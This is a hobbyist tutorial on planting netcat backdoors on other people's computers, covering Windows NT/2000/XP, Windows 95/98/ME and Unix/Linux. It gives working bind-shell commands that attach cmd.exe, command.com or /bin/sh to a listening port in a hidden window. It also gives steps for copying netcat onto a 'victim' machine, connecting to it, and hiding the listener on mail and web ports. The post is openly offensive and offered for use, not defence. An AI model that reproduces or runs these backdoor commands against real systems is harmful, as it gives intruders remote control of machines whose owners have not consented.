In this post I will walk you through the basic steps for setting up a backdoor with netcat on several Microsoft Windows flavours as well as on Unix/Linux.
1. The Problem
Here's what this whole guide is about: getting the backdoor to work on more than just Windows NT/2000/XP. When I first saw the guide on breaking into NT, I hurried up and viewed it. I began reading and it said something like, "This also works with 2000 and XP!" I thought to myself, "Now that's not right! What about Windows 95/98/ME and Unix!" So I read on about how the backdoor worked, and once I understood it I set off toward my goal of a multi-operating-system backdoor.
2. How the Backdoor Works - On Windows NT/2000/XP
For the backdoor, you'll need netcat for Windows (meaning you'll need a Windows box, too), which you can get from HERE.
You should also know how to make batch files, which you can learn on MY BLOG.
First, get the netcat executable file (nc.exe) into the target's c:\windows\system32 directory. Then make a batch file with the following command in it (replace <port> with the port number you want it to listen on):
nc -L -d -p <port> -t -e cmd.exe
Here's what that command does:
nc - tells Windows to run the nc.exe file with the following arguments:
-L Tells netcat to not close and wait for connections
-d Tells netcat not to open a Window when running
-p Specifies a port to listen for a connection on
-t Tells netcat to accept telnet connections
-e Tells what program to run once the port is connected to
Put the batch file in the c:\windows\system32 directory also and run it.
Once that batch file is run, you can telnet or use netcat in client mode to connect to it. Here's how to use netcat to connect to it:
In a DOS prompt, give the command (with <host> being the victim's address and <port> the port the batch file listens on):
C:\WINDOWS\> nc -v <host> <port>
Once you have connected to that port on the victim's computer, you'll have a DOS prompt on which you can give any command on the victim's computer.
The backdoor will close whenever the victim shuts down their computer. To get it running again, just run the batch file.
3. Getting the Backdoor to Work on Windows 95/98/ME
After reading, I thought to myself, "Now why can't I get that to work on 95/98/ME? Hmm... let's see here..."
Then I thought about how the commands worked and came up with a solution.
First, put the nc.exe file in the c:\windows directory.
Why? I'll explain later. Put the batch file there, too, but change the batch file to:
nc -L -d -p <port> -t -e command.com
There ya go - it'll work on 95/98/ME. Here's why:
First off, you don't need to put the files in the system32 directory because 95/98/ME doesn't use execute paths like NT does. If you hadn't put the files in the System32 directory on NT, the batch file wouldn't have run because it wouldn't have been in the file path - but you don't have to worry about that in 95/98/ME. The reason we put the files in the c:\windows directory on 95/98/ME is because that's where the command.com file is - the MS-DOS Prompt file. (It's cmd.exe on NT/2000/XP.) That's why we ran command.com instead of cmd.exe.
4. Getting the Backdoor to Work on Unix/Linux
Ok, first off, get the Unix version of netcat onto the target system.
Now, simply execute the following command on that system (again, <port> is the port to listen on):
nc -nvv -l -p <port> -e /bin/sh
For best results, put that command in a shell script. It is also a good idea to run the command on more than one port, and to run it on ports normally used by services such as mail (port 25) and web (port 80).
How does this work? Let's examine:
-nvv I'm not exactly sure what this does. Further research is required...
-l stay open and listen
-p what port to listen on
-e /bin/sh spawns a shell. You could use bash, tcsh, ksh etc. instead of sh for the shell of your choice.
So, let's see what we've learned overall:
Netcat is a useful hacker's tool that can set up backdoors. That says it all.
Thanks for reading!